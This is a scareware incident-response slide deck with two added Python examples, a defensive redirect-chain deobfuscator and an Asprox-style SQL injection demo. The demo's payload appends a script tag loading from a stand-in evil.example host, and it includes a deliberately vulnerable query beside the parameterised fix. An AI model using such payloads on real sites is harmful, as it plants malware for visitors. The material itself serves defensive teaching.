Scareware From Ireland - Twitter "markofu" & "irisscert" © 2009 IRISS

Slide 1: Scareware From Ireland
Mark Hillick, IrissCert Incident Handler
http://www.iriss.ie
mark.hillick@iriss.ie
Slide 2: What is Scareware?

Slide 3: Irish Scareware Exploit
Browse to Irish website & collect your fake anti-virus

Slide 4: Dialog-box fun...

Slide 5: Dialog-box fun cont...

Slide 6: System Scan

Slide 7: Trojan Log file

Slide 8: Money, please!

Slide 9: Are you sure?

Slide 10: Are you mad????

Slide 11: BSOD

Slide 12: Effect on the end-user...
Slide 13: Exploit
- Exploited sites hosted on one server: Microsoft FTPd & IIS 6.0
- Two most popular web site attacks: Gumblar (PHP sites), Asprox (SQL injection)
Slide 14: Pass the Parcel
- http://compromisedsite.ie
- http://jobstopfil.biz
- http://poppka.net
- http://sujetline.ru
- http://grownclubfest.ru
PDF & SWF files served back
Slide 15: Obfuscation
- Engaged SANS ISC malware team
- Heavily obfuscated JavaScript
- Used techniques not seen before
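Slides 14 and 15 describe the two things an analyst has to get through to reach the payload: a chain of redirecting hosts, and JavaScript obfuscation that hides each next hop. The Python below is an added example, not code from the IRISS investigation or the SANS ISC team; it walks a constructed, offline capture of such a chain (the hostnames, response bodies and the simple two-layer packer are all made up for the demo and are not the sites on slide 14), statically peels String.fromCharCode() and unescape() layers without ever executing the script, and identifies what the last hop serves by magic bytes rather than by the Content-Type header the server chose to send.

```python
"""
Follow a drive-by redirect chain ("pass the parcel") offline and peel the
JavaScript obfuscation layers that hide the next hop.

Added example; not code from the IRISS investigation. Every hostname,
response body and the obfuscated script below is constructed for the demo.
"""
import re
from urllib.parse import urljoin

# --- constructed sample traffic -------------------------------------------

def obfuscate_for_demo(js):
    """Stand-in for the attacker's packer: wrap js in eval(String.fromCharCode(...))."""
    return "eval(String.fromCharCode(" + ",".join(str(ord(c)) for c in js) + "))"

# Inner layer hides the iframe behind unescape(); the outer layer hides
# that behind fromCharCode(). Real samples stack more layers than this.
INNER_JS = ('document.write(unescape("%3Ciframe src=%22'
            'http://hop3.example/load.php?spl=pdf%22 width=1 height=1%3E%3C/iframe%3E"))')
OBFUSCATED_JS = obfuscate_for_demo(INNER_JS)

# url -> (content-type, body), as if captured with Burp / Live HTTP Headers.
RESPONSES = {
    "http://compromised.example/index.php": ("text/html",
        b"<html><body>Welcome!"
        b'<iframe src="http://hop1.example/in.cgi?3" width=1 height=1></iframe>'
        b"</body></html>"),
    "http://hop1.example/in.cgi?3": ("text/html",
        b'<html><head><meta http-equiv="refresh" '
        b'content="0;url=http://hop2.example/go.php"></head></html>'),
    "http://hop2.example/go.php": ("text/html",
        b"<script>" + OBFUSCATED_JS.encode() + b"</script>"),
    "http://hop3.example/load.php?spl=pdf": ("application/pdf",
        b"%PDF-1.4\n% constructed sample, body truncated"),
}

# --- static deobfuscation ---------------------------------------------------

FROMCHARCODE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+)\)")
UNESCAPE = re.compile(r"""unescape\(\s*(["'])(.*?)\1\s*\)""", re.S)

def js_unescape(s):
    """JavaScript unescape(): %uXXXX sequences first, then %XX."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return re.sub(r"%([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), s)

def deobfuscate(js, max_rounds=10):
    """Replace fromCharCode()/unescape() calls with their results until the
    text stops changing. No JavaScript is executed at any point."""
    for _ in range(max_rounds):
        before = js
        js = FROMCHARCODE.sub(
            lambda m: '"' + "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip()) + '"',
            js)
        js = UNESCAPE.sub(lambda m: '"' + js_unescape(m.group(2)) + '"', js)
        if js == before:
            break
    return js

# --- hop extraction and payload identification ------------------------------

NEXT_HOP_PATTERNS = [
    re.compile(r"""<iframe[^>]*\ssrc=["']?([^"'\s>]+)""", re.I),
    re.compile(r"""http-equiv=["']?refresh["']?[^>]*url=([^"'\s>]+)""", re.I),
    re.compile(r"""(?:window\.|top\.)?location(?:\.href)?\s*=\s*["']([^"']+)["']""", re.I),
]

def next_hop(text, base_url):
    for pat in NEXT_HOP_PATTERNS:
        m = pat.search(text)
        if m:
            return urljoin(base_url, m.group(1))
    return None

MAGIC = {b"%PDF": "pdf", b"FWS": "swf", b"CWS": "swf", b"MZ": "exe"}

def classify(body):
    """Identify the served file by magic bytes, not by the Content-Type header."""
    for magic, kind in MAGIC.items():
        if body.startswith(magic):
            return kind
    return None

def trace(start_url, responses, max_hops=10):
    """Walk the chain; stop at a binary payload, a loop, or a hop with no capture."""
    chain, url = [], start_url
    while url and len(chain) < max_hops:
        if url in chain:
            return {"chain": chain, "payload": "loop"}
        chain.append(url)
        if url not in responses:
            return {"chain": chain, "payload": "not captured"}
        _ctype, body = responses[url]
        kind = classify(body)
        if kind:
            return {"chain": chain, "payload": kind}
        url = next_hop(deobfuscate(body.decode("latin-1")), url)
    return {"chain": chain, "payload": "no payload"}

if __name__ == "__main__":
    print(trace("http://compromised.example/index.php", RESPONSES))
```

Because the decoding is purely textual, the script can be pointed at a captured response set without the risk of running the attacker's code; when a sample uses a layer the regexes do not cover (the talk notes the IRISS sample used techniques not seen before), deobfuscate() simply returns the text unchanged and trace() reports "no payload", which is the cue to hand the sample to a real JavaScript sandbox.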
Slide 16: Complex Design...

Slide 17: Tools Used
- Tamper Data, Live HTTP Headers (Firefox)
- Burp Suite
- Tcpdump, Wireshark & Netwitness
- Dig/nslookup
Slide 18: Incident Handling - Containment
Image source: http://www.tazworld.co.uk/gallery/pictures/www.tazworld.co.uk_taz_035.gif © Warner Bros. Entertainment Inc.

Slide 19: Incident Handling - Eradication
Image source: http://www.alexross.com/CJ011.jpg © Warner Bros. Entertainment Inc.

Slide 20: Incident Handling - Recovery
Dilbert © 2009, United Feature Syndicate, Inc.
Slide 21: Incident Handling - Lessons Learned
- Patch web-server & application
- Input validation
- Close unnecessary open ports (e.g. FTP)
- Password policy
- Regular back-ups
- Web-app security testing
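Slide 13 names Asprox, a campaign that used SQL injection to append script tags to the text stored in a site's database, and slide 21 lists input validation and web-app security testing among the lessons. The Python below is an added example, not code from the deck or from the compromised site: it runs one constructed payload through a string-built UPDATE and through the bound-parameter form, then runs the query a recovery step would use to find the rows that were hit. sqlite3, the pages table, the page text and the attacker's payload are all stand-ins constructed for the demo.

```python
"""
Asprox-style SQL injection against a content update, beside the
parameterised form that stops it, plus the query a recovery step would
run to find affected rows.

Added example, not code from the compromised site or from the deck.
The table, the page text and the attacker's payload are constructed;
sqlite3 stands in for the site's real database.
"""
import sqlite3

# Constructed payload. The leading quote closes the value, `|| body ||`
# appends to the existing text, `WHERE 1=1` widens the update to every
# row, and `--` comments out the application's own WHERE clause.
INJECTED_SCRIPT = '<script src="http://evil.example/js.js"></script>'
PAYLOAD = "' || body || '" + INJECTED_SCRIPT + "' WHERE 1=1 --"

def make_db():
    """Fresh in-memory site database with three constructed pages."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE pages (id INTEGER PRIMARY KEY, body TEXT NOT NULL);
        INSERT INTO pages (body) VALUES ('About us'), ('Contact'), ('Jobs');
    """)
    return conn

def update_page_vulnerable(conn, page_id, body):
    """String formatting splices attacker text into the SQL grammar."""
    sql = "UPDATE pages SET body = '%s' WHERE id = %d" % (body, page_id)
    conn.execute(sql)
    conn.commit()
    return sql  # returned so the statement that actually ran can be inspected

def update_page_safe(conn, page_id, body):
    """Bound parameters: the payload is stored as text, never parsed as SQL."""
    conn.execute("UPDATE pages SET body = ? WHERE id = ?", (body, page_id))
    conn.commit()

def find_injected_pages(conn, marker="<script"):
    """Recovery helper: ids of rows carrying the injected tag."""
    rows = conn.execute(
        "SELECT id FROM pages WHERE lower(body) LIKE ? ORDER BY id",
        ("%" + marker.lower() + "%",))
    return [r[0] for r in rows]

def page_bodies(conn):
    return [r[0] for r in conn.execute("SELECT body FROM pages ORDER BY id")]

def demo():
    """Same payload through both code paths; report how many rows each one touched."""
    vuln = make_db()
    update_page_vulnerable(vuln, 1, PAYLOAD)
    safe = make_db()
    update_page_safe(safe, 1, PAYLOAD)
    return {"vulnerable": find_injected_pages(vuln), "safe": find_injected_pages(safe)}

if __name__ == "__main__":
    print(demo())
```

With the vulnerable path, an update meant for one page rewrites every row, which is exactly how a single injectable parameter turns a whole site into a scareware distribution point. The parameterised path confines the damage to the one row the request named, but it still stores the script tag as literal text, so the validation and output encoding the slide calls for are needed on top of bound parameters, not instead of them.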
Slide 22: Securing the Desktop
End-User Defence
- Rescue CDs: Google -> "rescue site:raymond.cc"
- Free tools: http://zeltser.com/fighting-malicious-software/
Slide 23: Next Steps & Extra Info
- SANS GCIH Gold Paper
  - Scareware & its evolution
  - Incident handling process
- Full incident report
  - http://www.iriss.ie (in shared documents)
  - http://www.hillick.net/things/scareware.doc
Slide 24: References
- Sunbelt Blog
- Dancho Danchev Blog
- SANS ISC (thanks to @bojanz)
- VRT-Sourcefire Blog
- Symantec White Papers
- SANS Forensics Blog
Slide 25: That's it...
Hat tip for image: Jesse M. Heines, http://teaching.cs.uml.edu/~heines/images/questions.gif